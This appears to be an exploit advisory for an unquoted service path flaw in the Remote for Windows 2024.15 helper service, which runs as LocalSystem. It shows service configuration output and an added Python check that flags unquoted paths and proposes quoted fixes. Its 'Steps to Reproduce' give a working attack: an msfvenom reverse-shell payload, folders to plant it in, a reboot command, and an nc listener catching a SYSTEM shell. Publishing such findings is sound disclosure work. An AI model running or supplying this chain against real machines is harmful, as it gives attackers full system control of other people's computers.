Remote for Windows 2024.15 Unquoted Service Path
# Exploit Title: Remote for Windows 2024.15 - Unquoted Service Path
# Date: 2025-05-23
# Exploit Author: Chokri Hammedi
# Vendor Homepage: https://rs.ltd
# Software Link: https://rs.ltd/latest.php?os=win
# Version: 2024.15
# Tested on: Windows 10/11 with Remote for Windows (helper)


Description:

The Remote4WindowsService installs with an unquoted service path and runs
as LocalSystem.


C:\>sc qc Remote4WindowsService
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: Remote4WindowsService
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\Evgeny Cherpak\Remote for Windows\Remote4WindowsService.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Remote4WindowsService
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem

C:\>


PS C:\> reg query "HKLM\SYSTEM\CurrentControlSet\Services\Remote4WindowsService" /v ImagePath

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Remote4WindowsService
ImagePath REG_EXPAND_SZ C:\Program Files\Evgeny Cherpak\Remote for Windows\Remote4WindowsService.exe

PS C:\>
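
An added defensive check, not part of the original advisory: it flags ImagePath values that are unquoted and contain a space in the executable path, then returns the quoted replacement and the parent directories whose write ACLs should be reviewed. The function names and the three extra sample services are constructed for illustration; only the Remote4WindowsService path comes from the output above.

```python
import ntpath
import re

# Constructed sample: the ImagePath from the advisory plus three made-up
# entries covering quoted, space-free and argument-bearing values.
SAMPLE_SERVICES = {
    "Remote4WindowsService":
        r"C:\Program Files\Evgeny Cherpak\Remote for Windows\Remote4WindowsService.exe",
    "QuotedSvc": r'"C:\Program Files\Example Vendor\svc.exe" --run',
    "NoSpaceSvc": r"C:\Windows\System32\svchost.exe -k netsvcs",
    "ArgsSvc": r"C:\Program Files\Example Vendor\agent.exe /service",
}

# End of the executable: ".exe" followed by whitespace or end of string.
_EXE_END = re.compile(r"\.exe(?=\s|$)", re.IGNORECASE)


def split_image_path(image_path):
    """Return (executable, arguments) for an unquoted ImagePath value."""
    m = _EXE_END.search(image_path)
    if not m:
        return image_path.strip(), ""
    return image_path[:m.end()].strip(), image_path[m.end():].strip()


def audit(image_path):
    """Return None if the value is safe, else the quoted fix and dirs to audit."""
    value = image_path.strip()
    if value.startswith('"'):          # already quoted
        return None
    exe, args = split_image_path(value)
    if " " not in exe:                 # unquoted but unambiguous
        return None
    dirs, parent = [], ntpath.dirname(exe)
    while True:                        # walk up to the drive root
        dirs.append(parent if parent.endswith("\\") else parent + "\\")
        up = ntpath.dirname(parent)
        if up == parent:
            break
        parent = up
    fixed = f'"{exe}"' + (f" {args}" if args else "")
    return {"fixed": fixed, "audit_dirs": dirs[::-1]}


def audit_all(services):
    """Map service name -> finding for every unquoted path with spaces."""
    return {n: f for n, p in services.items() if (f := audit(p))}
```

On a live host, feed `audit_all` the ImagePath values read from `HKLM\SYSTEM\CurrentControlSet\Services`; the `fixed` string is the value the service's ImagePath should be set to.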

# Steps to Reproduce:

1. Generate the payload

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.8.101 LPORT=8081 -f exe > shell.exe

2. Move the shell.exe to: (if writable)
"c:\" or
"C:\Program Files\" or
"C:\Program Files\Evgeny Cherpak\" or
"C:\Program Files\Evgeny Cherpak\Remote for Windows\"

3. Restart Windows: shutdown /r /t 1

4. Catch the shell as SYSTEM

$ nc -lnvp 8081
listening on [any] 8081 ...
connect to [192.168.8.101] from (UNKNOWN) [192.168.8.105] 49672
Microsoft Windows [Version 10.0.19045.5011]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

C:\Windows\system32>